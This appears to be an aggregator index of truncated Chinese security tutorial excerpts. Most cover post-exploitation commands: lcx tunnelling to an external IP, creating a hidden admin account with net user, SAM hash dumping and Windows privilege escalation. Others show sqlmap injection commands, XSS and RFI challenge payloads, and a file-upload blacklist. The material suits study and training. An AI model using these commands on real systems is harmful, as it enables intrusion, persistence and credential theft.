lcx 内网转发
把放置到已经控制的内网主机
执行
内网主机输入命令 lcx.exe -slave 外网ip 外网端口 内网ip 内网端口 lcx.exe -slave 30.1.85.55 2222 127.0.0.1 3389
外网主机输入命令 lcx.exe -liste...[2019/5/31]
创建超级隐藏用户
1.先通过命令创建隐藏账户
net user test$ 123.com /add
在net user
发现看不到用户 但是 在用户组是可以看到的
先把加入管理员组在禁用
我们可以把用户命名成上面一样的用户名&n...[2019/5/31]
Java使用Cipher类实现加密,包括DES,DES3,AES和RSA加密
一、先看一个简单加密,解密实现
1.1 加密
/**
* content: 加密内容
* slatKey: 加密的盐,16位字符串
* vectorKey: 加密的向量,16位字符串
*/
public String encrypt(String content, Str...[2019/5/30]
SqlMap常用参数(一)
sqlmap可谓是利用sql注入的神器了,sqlmap的参数很多,接下介绍几种常见的参数。
一。注入acce 数据库常用的参数
sqlmap.py -u "url" 判断参数是否存在注入
sqlmap.py -u "url" --tables 猜解表名
sqlmap...[2019/5/30]
如何利用开源风控系统(星云)防止撞库?
在企业发展过程中,日益增多的业务形态往往会招致新的业务风险。简单的业务防护已经不足以解决问题。一套完整的业务风控系统可以帮助企业有效的规避风险,降低损失。
TH-Nebula(星云)是威胁猎人开源的业务风控系统。在业务安全应用门槛普遍过高的当下,我们希望以开源的方式,降低大家的...[2019/5/30]
明文存储密码,为何连谷歌也无法杜绝?
1.一些小网站或许数据库会明文存储密码,而知名互联网公司绝无可能,但后者的业务系统颇为复杂,关联功能可能意外隐藏着明文存储漏洞,因此例行安全检测都额外注意这点。 2.尽管大公司多数明文存储漏洞没有造成影响,但也有漏网之鱼,被外界捕捉。 3.明文存储密码漏洞的主要由灯下黑、设计考虑不周、历史遗留、过...[2019/5/29]
web安全之windows系统基础
1.系统目录
(1)一个存放账号密码的文件:
Window System32/config/SAM
(2)hosts文件
Window System32/driver etc/hosts
利用hosts文件可以进行域名欺骗和钓鱼,前提是你已经进入被攻击者的windows操作系统...[2019/5/29]
MS09-012 PR提权
漏洞编号:MS09-012
披露日期: 2009/4/14
受影响的操作系统:Windows 2008 x64 x86;XP;Server 2003 sp1 sp2;
测试系统:windows 2003 x86
上传到...[2019/5/28]
MS09-020 iis6.0提权
漏洞编号:MS09-020
披露日期: 2009/6/9
受影响的操作系统:Windows 2003 x64 sp1 sp2;XP;
测试系统:windows 2003 x64
上传
执行 iis6.0.exe "net user temp 123.com /...[2019/5/28]
证券secuerity英语secuerity安全
中文名:证券
外文名:security、secuerity
类别:经济权益凭证统称
组成:资本证券、货币证券和商品证券
作用:用来证明持者权益的法律凭证
图集
目录
1 发展历程 ? 世界 ? 中国 2 基本特征 3 分类 ? 性质分类 ? 收益...[2019/5/27]
提权案例(一)渗透某asp.net网站通过sql server数据库public 提权 思路分享
先罗列出sql server 角色用户的权限
按照从最低级别角色(bulkadmin)到最高级别角色(sysadmin)的顺序进行描述:1.bulkadmin:这个角色可以运行BULK INSERT语句.该语句允许从文本文件中将数据导入到SQL Server2008数据库中,为需要执行大容量插...[2019/5/27]
MS12-042 用户态调度机制特权提升漏洞MS12-042 用户态调度机制特权提升漏洞
漏洞编号:MS12-042
披露日期: 2012/6/12
受影响的操作系统:Windows 2000;XP;Server 2003;windows 7;Server 2008;
测试系统:windows 7 x64
利用网上现有的提权工具 测试
运行tes...[2019/5/27]
windows 抓hash获取管理员密码windows 抓hash获取管理员密码
webshell 找能执行权限的目录上传
C:\Windows\System32\config\sam 内有windows 密码 利用工具把密码抓出来
samcopy 直接抓取
GetHASHES.exe $Local 返回当前系统所有的用户的哈希
pwdump7.exe 自...[2019/5/22]
CVE-2019-0808内核漏洞原理利用分析CVE-2019-0808内核漏洞原理利用分析
漏洞概述
CVE-2019-0808是微软在2019年3月修补的内核漏洞,该漏洞只影响Windows 7和Windows Server 2008,漏洞允许攻击者提升权限并在内核模式下执行任意代码。在谷歌威胁分析团队的报告中发现该漏洞用于进行Chrome沙箱逃逸,和CVE-2019-5786 C...[2019/5/22]
第三方应用 flashfxp,filezilla提权第三方应用 flashfxp,filezilla提权
filezilla 提权
filezilla 开源的ftp服务器
默认监听14147端口
默认安装目录下有个敏感文件 filezillaserver.xml(包含用户信息)
filezillaserver interface.xml(包含了管理信息)
提权思路:
下载两个文...[2019/5/21]
Excel的IYQ钓鱼
Excel的IYQ钓鱼
0x00 环境准备
操作系统:windows7
microsoft office版本:office 2010
0x01 了解IYQ的基本概念
可以将IYQ简单的理解成内置在excel中的一种特殊‘web浏览器’(不能加载脚本),通过IQ...[2019/5/21]
第三方软件 G6ftp提权
步骤
1.下载配置文件 将administrator
2.利用lcx 端口转发 默认只允许本机连接
3.lcx.exe -tran 8027 127.0.0.1 8021
4.使用客户端以管理员用户登录
5.创建用户并权限设置和执行批处理文件
6.上传批处理
7.创建普...[2019/5/20]
文件上传绕过(旧)文件上传绕过(旧)
1.js 验证
修改js
2.后缀名黑名单
比如:
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pH...[2019/5/20]
windows 系统对应的内核版本和自带 iis 版本
Windows 10
10.0*
Windows Server 2016
10.0*
Windows 8.1
6.3*
Windows Server&nbs...[2019/5/20]
第三方软件 Serv-u提权
Serv-U FTP Server,是一种被广泛运用的FTP服务器端软件,支持3x/9x/ME/NT/2K等全Windows系列。可以设定多个FTP服务器、限定登录用户的权限、登录主目录及空间大小等
Serv-U提权分两种
1.有修改权限
2....[2019/5/20]
第三方软件 pcanywhere提权
pcanywhere 是一个远程管理软件
1.访问pcanywhere默认安装目录
访问 下载打开
利用破解工具直接
选择刚刚下载的软件 点破解
拿到用户密码后去百度下载客户端让后连接 原文链接:http: www.cnblogs.com/yuanzij...[2019/5/20]
Word模板注入攻击
Word模板注入攻击
0x00 工具准备
phishery:https: github.com/ryhanson/phishery/releases
office版本:office 2010
0x01 什么是Word模板注入攻击
Word模板注入攻击就是利用Word文档加载附加模板时...[2019/5/17]
MySQL基于报错注入2 - APT-101
目标站点:
0x1 注入点判断
http: www.xxxxxx.com/page ervices.php?id=1 #true
http: www.xxxxxx.com/page ervices.php?id=1'' #false
...[2019/5/10]
MySQL报错注入总结 - APT-101
mysql暴错注入方法整理,通过floor,UpdateXml,ExtractValue,NAME_CONST,Error based Double Query Injection等方法。
报错注入:(and后不能直接跟select,可以加())
1.报错注入floor---->(s...[2019/5/9]
SQLMAP之tamper详解 - APT-101
sqlmap 是一款注入神器广为人知,里面的 tamper 常常用来绕过 WAF ,很实用的模块,但是却常常被新手忽略(比如我),今天就整理总结一下 tamper 的用法以及 tamper 的编写
PS:工具既然叫做工具,就是用来辅助上单的,呸辅助我们完成某些任务的,仅仅适用于当进行某些重复的繁...[2019/5/9]
MySQL基于报错注入 - APT-101
0x1 判断注入点:
http: www.xxxx.ro .php?id=1''
那么尝试闭合下单引号
http: www.xxxx.ro .php?id=1'' --+
0x2 枚举下表的列
http: www.xxxx.ro .ph...[2019/5/9]
SQLMAP注入教程-11种常见SQLMAP使用方法详解 - APT-101SQLMAP注入教程-11种常见SQLMAP使用方法详解 - APT-101
一、SQLMAP用于Acce 数据库注入
python sqlmap.py -u "http: www.xxx.com/en/CompHonorBig.asp?id=7"
python sqlmap.py -u "http: www.xxx.com/en/CompHonorBig.asp?i...[2019/5/8]
union注入的几道ctf题,实验吧简单的sql注入1,2,这个看起来有点简单和bugku的成绩单
这几天在做CTF当中遇到了几次sql注入都是union,写篇博客记录学习一下。
首先推荐一篇文章“https: blog.csdn.net/Litbai_zhang/article/detail 83869918”
...[2019/5/8]
实验吧简单的SQL注入1,简单的SQL注入
接上面一篇博客。
实验吧简单的sql注入1
题目连接 http: ctf5.shiyanbar.com/423/web/
同样,直接输入 1加个但引号,结果下面有返回错误, ...[2019/5/8]
通过user.MYD MySQL密码 - APT-101
具体的获取方法:
1)通过hex 十六进制的工具打开user.MYD文件
这里使用:0XED
2)复制MySQL密码出来,进行分析
*CEAF6E9FA3A448A25AC9D00C8D7078385 #33位
前面带...[2019/4/30]
源码安全:悬在大厂头上的达摩克利斯之剑
本文首发于 CODING 官方微信公众号——
《源码安全:悬在大厂头上的达摩克利斯之剑》
“ Please help us!!!”
从 B 站源码泄露开始到 GitHub 最终删除代码的两小时,大概是今年 B 站最煎熬的时刻,以至于他在向 Github 求助删除的 DMCA 邮件中,在...[2019/4/30]
涨姿势:抛弃字母、数字和下划线写SHELL - APT-101涨姿势:抛弃字母、数字和下划线写SHELL - APT-101
PHP中异或 (^) 的概念
<?php echo"A"^"?";?>
<?php echo"A"^"?";?>
输出的结果是字符 “~”,这是因为代码对字符 “A” 和字符 ...[2019/4/30]
win10 DVWA下载安装配置(新手学渗透)
电脑重装系统了,需要重新装一下渗透测试的学习环境DVWA,借此机会就跟大家讲一下DVWA的安装过程,因为不同的电脑配置、环境不同,在我的电脑上按照我这个安装教程是一次性就安装好了的。如果安装的时候遇到了什么问题,欢迎大家在评论区讨论,我每天都会查看博客,看到了能解决我就会回复。
安装过程总共...[2019/4/29]
跨站脚本攻击XSS原理与防范实例分析跨站脚本攻击XSS原理与防范实例分析
本文实例讲述了跨站脚本攻击XSS原理与防范。分享给大家供大家参考,具体如下:
跨站脚本攻击(Cro Site Script为了区别于CSS简称为XSS)指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的...[2019/4/28]
pwn学习(1)
0x00 简介
入职之后,公司发布任务主搞pwn和re方向,re之前还有一定的了解,pwn我可真是个弟弟,百度了一番找到了蒸米大佬的帖子,现在开始学习。
0x01 保护方式
NX (DEP):堆栈不可执行
ASLR:内存地址随机化,在linux和pie相结合,aslr是系统是否开启,有0.1...[2019/4/26]
SQL过滤字符后手工注入漏洞测试(第1题) - APT-101
https: www.mozhe.cn/bug/detail/a1diUUZsa3ByMkgrZnpjcWZOYVEyUT09bW96aGUmozhe
分析题目,属于时间盲注,这种情况,通常使用sqlmap 直接注入就行了,手动语法太复杂了!!!
...[2019/4/24]
SQL注入渗透实战 - APT-101
概述:
判断注入点:
http: www.xxxxx.com/page.php?pid=42 and 1=1 #true
http: www.xxxxx.com/page.php?pid=42 and 1=2 #false
...[2019/4/24]
从B站的代码泄露事件中,我们能学到些什么?
先声明一下,本文不聊ISSUE中的七七八八,也不聊代码是否写的好,更不聊是不是跟蔡徐坤有关之类的吃瓜内容。仅站在技术人的角度,从这次的代码泄露事件,聊聊在代码的安全管理上,通常都需要做哪些事来预防此类事件的发生。同时,大家在阅读本文的时候,也可以深入思考下,自己团队是否也存在类似的问题,经过这次的...[2019/4/23]
Google XSS Challenge - APT-101Google XSS Challenge - APT-101
https: x -game.appspot.com/level1
https: x -game.appspot.com/level1
payload: <svg onload=alert(1)>
https...[2019/4/23]
RFI to RCE challenge - APT-101RFI to RCE challenge - APT-101
http: www.zixem.altervista.org/RCE/level1.php
构造payload:
https: zixem.altervista.org/RCE/level1.php?page=https: raw.githubu...[2019/4/22]
XSS Challenges xss-quiz.int21h.jp - APT-101
概述:
https: x -quiz.int21h.jp/
Stage #1
payload: <script>alert(document.domain);< cript>
Stage #2
http: x -q...[2019/4/22]
Challenges-XSS - APT-101
https: alf.nu/alert1
warmup
adobe
JSON
原文链接:http: www.cnblogs.com/hack404/p/10742031.html[2019/4/22]
常见的web攻击手段总结
xxs攻击(跨站脚本攻击)
攻击者在网页中嵌入恶意脚本程序,当用户打开该网页时脚本程序便在浏览器上执行,盗取客户端的cookie、用户名密码、下载执行病毒木马程 序
解决:
我们可以对用户输入的数据进行HTML转义处理,将其中的尖括号、单引号、引号之类的特殊字符进行编码
Csrf攻...[2019/4/22]
Multi Reflection (Pro Only) - APT-101
Case 14 - Double Injection in HTML Context with Double Quotes
https: brutelogic.com.br/multi/double-html.php?p="</a><svg onload=alert(1)&g...[2019/4/18]
DOM-based XSS Test Cases - APT-101DOM-based XSS Test Cases - APT-101
Case 23 - DOM Injection via URL parameter (by server + client)
https: brutelogic.com.br/dom/dom.php?p=Hello.<svg onload=alert(1)>
https: br...[2019/4/18]
常见的7种XSS - APT-101
1. URL Reflection
当URL以某种方式反映在源代码中时,我们可以添加自己的XSS向量/有效负载。对于PHP页面,可以使用斜杠字符(/)在页面名称之后添加任何内容
http: brutelogic.com.br/x .php/”><svg onload...[2019/4/16]
xss小结-从xss平台搭建到csp规则
0x00前言
x 是跨站脚本攻击,利用嵌入js代码达到‘控制’对方浏览器的作用,测试的时候我们是用alert(1)弹窗,而做CTF也好,实际中的漏洞利用也好一般是用x 获取管理员的cookie
0x01x 平台搭建
网上有x 的在线平台,但是别...[2019/4/15]
Security+高分考过经验分享812分
Security +也是无意中从谷安的宣传单知道的,本来就是想从事安全的行业,而且Security +含金量高,是国际认可的认证就想着去考一考试试。
大概从2018.12开始正式准备的,前面时间都是停停看看的那种,因为本身自己也是学生课业量也很大除了每天上课...[2019/4/15]
web安全入门课程笔记——SQL漏洞分析与利用web安全入门课程笔记——SQL漏洞分析与利用
3-1SQL语言基础
3-2ACCESS手工注入
And1=1是什么意思:进入数据库查询信息,判断是否存在注入点。
Exists(select*from admin):查询语句
3-6MySQL手工注入
...[2019/4/15]
MSF里MS17_010利用模块笔记MSF里MS17_010利用模块笔记
1. auxiliary canner mb mb_ms17_010 扫描检测漏洞辅助模块
扫描结果这里可以看到 2,3,4这几台主机存在此漏洞!
2. auxiliary/adm...[2019/4/15]